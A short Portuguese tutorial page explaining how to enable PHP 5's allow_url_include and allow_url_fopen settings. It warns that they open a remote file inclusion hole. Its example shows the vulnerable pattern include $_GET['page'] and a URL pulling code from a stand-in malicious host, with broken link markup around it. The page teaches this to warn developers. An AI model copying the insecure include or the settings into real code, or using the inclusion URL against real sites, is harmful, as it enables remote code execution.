PHP 5 - Utilizar um URL externo com a função "include"

Dezembro 2016

A opção para incluir um URL externo (isto é, absoluto, da forma http://site.tld/url) através da função "include" é desativada por padrão nas versões do PHP 5 e posteriores , para ativá-la em seu servidor coloque essas duas linhas no seu arquivo php.ini

allow_url_include = 1
allow_url_fopen = 1

Para mais informações veja AQUI

NOTA IMPORTANTE: No entanto, é muito perigoso ativar a opção "allow_url_include". Na verdade, ela pode, em alguns casos, causar falhas de segurança graves, se o desenvolvedor for negligente.

Vejamos um exemplo simples: você tem um script PHP que inclui uma página com base no que você dá como argumentos através da URL.

Isso quer dizer que ao digitar http://seusite.flet/mapeamento.php?pagina=pagina_a_incluir.php você inclui a página "pagina_a_incluir.php".

Se o seu código se parece com isso: include $_GET['page']; então, você deixa qualquer um injetar um código externo. Na verdade, nada me impede de incluir uma página php que venha do meu site:

href= <a href='http://sitemalicioso.pumm/paginamaliciosa.php'' target='_blank'><a href='http:// sitemalicioso. pumm/paginamaliciosa.php'' target='_blank'>http://sitemalicioso. pumm/paginamaliciosa.php'</a></a> target='_blank' rel='nofollow'>http://seusite.flet/mapeamento.php?http://sitemalicioso.pumm/paginamaliciosa.php</a>

Portanto, tenha cuidado quando você ativar esta opção.


Tradução feita por Lucia Maurity y Nouira

Veja também :
Este documento, intitulado « PHP 5 - Utilizar um URL externo com a função "include" »a partir de CCM (br.ccm.net) está disponibilizado sob a licença Creative Commons. Você pode copiar, modificar cópias desta página, nas condições estipuladas pela licença, como esta nota aparece claramente.